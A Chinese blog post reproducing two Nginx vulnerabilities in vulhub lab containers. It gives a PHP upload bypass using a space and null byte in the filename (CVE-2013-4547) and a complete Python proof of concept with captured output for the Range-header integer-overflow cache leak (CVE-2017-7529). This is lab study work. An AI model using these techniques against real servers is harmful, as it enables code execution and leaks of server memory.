Nginx漏洞复现

-ALe-

已于 2025-07-13 23:28:03 修改

阅读量306

点赞数 3

CC 4.0 BY-SA版权

文章标签：安全 web安全

于 2025-04-08 20:01:31 首次发布

本文链接：https://blog.youkuaiyun.com/ALe0721/article/details/147076069

vulhub起靶场

Nginx 文件名逻辑漏洞（CVE-2013-4547）

上传1.gif，内容为

<?php phpinfo();?>

http://your-ip:8080/uploadfiles/1.gif[0x20][0x00].php访问文件位置，这里0x00要改包

先访问/uploadfiles/1.gif a.php（a是用来占位置的）然后在

这里把a的61改成00，然后放包

解析成功

Nginx越界读取缓存漏洞（CVE-2017-7529）

docker起环境直接拿poc打

import requests
import time
import urllib3


def cve20177529():
    try:

        # 构造请求头

        headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
        }
        url = input('请输入目标URL:')

        # 获取正常响应的返回长度

        # verify=False防止ssl证书校验，allow_redirects=False，防止跳转导致误报的出现
        r1 = requests.get(url, headers=headers, verify=False, allow_redirects=False)
        url_len = len(r1.content)

        # 将数据长度加长，大于返回的正常长度

        addnum = 200
        final_len = url_len + addnum

        # 构造Range请求头，并加进headers中

        # headers['Range'] = "bytes=-%d,-%d" % (final_len, 0x8000000000000000-final_len)

        headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36",
            'Range': "bytes=-%d,-%d" % (final_len, 0x8000000000000000 - final_len)
        }

        # 用构造的新的headers发送请求包,并输出结果

        r2 = requests.get(url, headers=headers, verify=False, allow_redirects=False)
        text = r2.text
        code = r2.status_code
        if ('ETag') in text and code == 206:
            print('存在Nginx整数溢出漏洞（CVE-2017-7529）,已输出到cve20177529_log.txt')

            # 将结果输出到文本上

            with open('cve20177529_log.txt', 'a', encoding="utf-8") as f:
                f.write('存在Nginx整数溢出漏洞（CVE-2017-7529）-------------' + time.strftime('%Y-%m-%d %H:%M:%S',
                                                                                            time.localtime(
                                                                                                time.time())) + '-------------\n' + r2.text)
                f.close
        else:
            print('未检测到漏洞')

            # 将结果输出到文本上

            with open('cve20177529_log.txt', 'a', encoding="utf-8") as f:
                f.write('未检测到漏洞-------------' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(
                    time.time())) + '-------------\n' + r2.text)
                f.close

    except Exception as result:
        print(result)


if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    cve20177529()

存在Nginx整数溢出漏洞（CVE-2017-7529）-------------2025-04-08 19:26:35-------------


--00000000000000000002

Content-Type: text/html; charset=utf-8

Content-Range: bytes -200-611/612



, 08 Apr 2025 11:18:02 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 612

Last-Modified: Tue, 27 Jun 2017 13:40:50 GMT

Connection: close

ETag: "59526062-264"

Accept-Ranges: bytes



<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>


--00000000000000000002

Content-Type: text/html; charset=utf-8

Content-Range: bytes -9223372036854774384-611/612

得到敏感信息